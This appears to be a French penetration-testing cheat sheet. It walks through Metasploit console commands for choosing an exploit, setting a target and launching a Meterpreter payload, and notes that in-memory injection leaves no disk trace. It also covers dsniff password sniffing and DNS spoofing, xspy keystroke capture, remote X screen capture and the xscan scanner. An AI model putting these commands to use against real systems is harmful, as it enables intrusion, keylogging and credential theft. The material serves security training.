Sniffer



Se renseigner sur les failles d'actualités

http://www.securityfocus.com/
http://www.securiteam.com/exploits/
http://www.lsd-pl.net/vulnerabilities.html
http://www.insecure.org/sploits.html
http://www.securitytube.net/
http://packetstormsecurity.org/
http://www.exploit-db.com

1.  Scanneurs de vulnérabilités

Généralement peu discret face au NIDS
Nessus (http://www.nessus.org/)
SAINT (http://www.wwdsi.com/saint/)
Metasploit (http://www.metasploit.com/)


2.  Metasploit


Metasploit Framework & organisation :

 

Différentes interfaces sont disponibles  :  msfgui / msfweb/ msfcli / msfd /msfconsole
   
Après avoir compris les fondamentaux de Metasploit voir également Armitage qui propose une interface conviviale et épurée.

  • Trouver des exploits en fonction de l'OS
#ls /pentest/exploits/framework/modules/exploits/

  • Les modules auxiliaires comprennent les applications pour scanner et analyser
#ls /pentest/exploits/framework/modules/auxiliary/

  • Répertoire des outils (ex : exe2vba.rb)
#ls pentest/exploits/framework/tools

  • Utilisation de Metasploit
 Accéder au Framework Metasploit 
#./msfconsole

Obtenir les commandes dans msfconsole
#msf > ?

  • Vérifier les exploits disponibles

#msf> show exploits

  •  Vérifier les payloads disponibles

#msf> show payloads

3 types de Payload:
-Singles
-Stagers
-Stages

  • Utiliser les commandes de recherches

#msf> search xp

  •  Use the use commands to launch exploits and more
#msf> use xp

  • Show options for the modules

#msf exploit xp > show options

  • Configure the module options

#msf exploit xp > set RHOST 192.168.1.2

Lancer l'Exploit et le Payload associé: pour un Exploit plusieurs Payload peuvent-etre utilisé.

  • Premièrement lister les Payload

#msf exploit xp > set PAYLOAD

  • Sélectionner un Payload

#msf exploit xp > set PAYLOAD windows/user

  • Lancer

#msf exploit xp >  exploit

  • Trouver des exploits :
http://www.cve.mitre.org/
http://osvdb.org/
http://securityfocus.com

  • Copier les Payloads ou les Exploits dans un fichier

#vim dcom.c
  • Compiler le code:

#gcc dcom.c


Les Bases de Meterpreter et de stdapi





Outrepasser les limitations du Payload en utilisant Meterpreter: 
- migration des processus mémoire
- exécution de commandes
- lecture et écriture du registre 
- accès aux fichiers système
En utilisant l'injection de DLL en mémoire, cela ne laisse aucune trace sur le HD.

·         Une fois l'Exploit lancé, expédier le Payload windows/meterpreter/bind_tcp

#msf exploit xp> set PAYLOAD windows/meterpreter/bind_tcp

#msf exploit xp > show options

#msf exploit xp > exploit

#meterpreter >

·         Commandes de bases

#meterpreter > ?


3.  DSniff


Dsniff est un sniffer de mot de passe avec un ensemble d'utilitaires pouvant analyser différents protocoles d'applications et en extraire les informations. 

/etc/dsniff/
/etc/dsniff/dnsspoof.hosts --> Sample hosts file. If no hostfile is specified, replies will forged for all address queries on the LAN with an answer of the local machine’s IP address.
/etc/dsniff/dsniff.magic --> Network protocol magic
/etc/dsniff/dsniff.services --> Default trigger table


4.  Xspy


Xspy permet de capturer la frappe au clavier
(http://www.acm.vt.edu/~jmaxwell/programs/xspy/xspy.html)

#./xspy -display vulnerable_host:0
ls
who
rlogin -l user01 host passwd

5.  XWD : Capturer le Display 


#/usr/X11R6/bin/xwd -display vulnerable_host:0 -root -out file.dmp
#/usr/X11R6/bin/xwud -in file.dmp

6.  Finger : obtenir des comptes valides


L'accès à ce service est restreint par les TCP Wrappers: il faut avoir recours, soit à l’IP Spoofing, soit au finger forwarding pour obtenir ces informations.

7.  XScan


Un scanneur généraliste sur les vulnérabilités réseau : support NASL, détecte les types de services, les OS distants et les faiblesses des mots de passe

http://www.martnet.com/~johnny/exploits/X/xscan.c
http://www.middlegeorgia.org/video/xscan.html


#./xscan 192.168.1.X –s

Trying 192.168.1.43 .Socket is already connected   -->  Vulnérable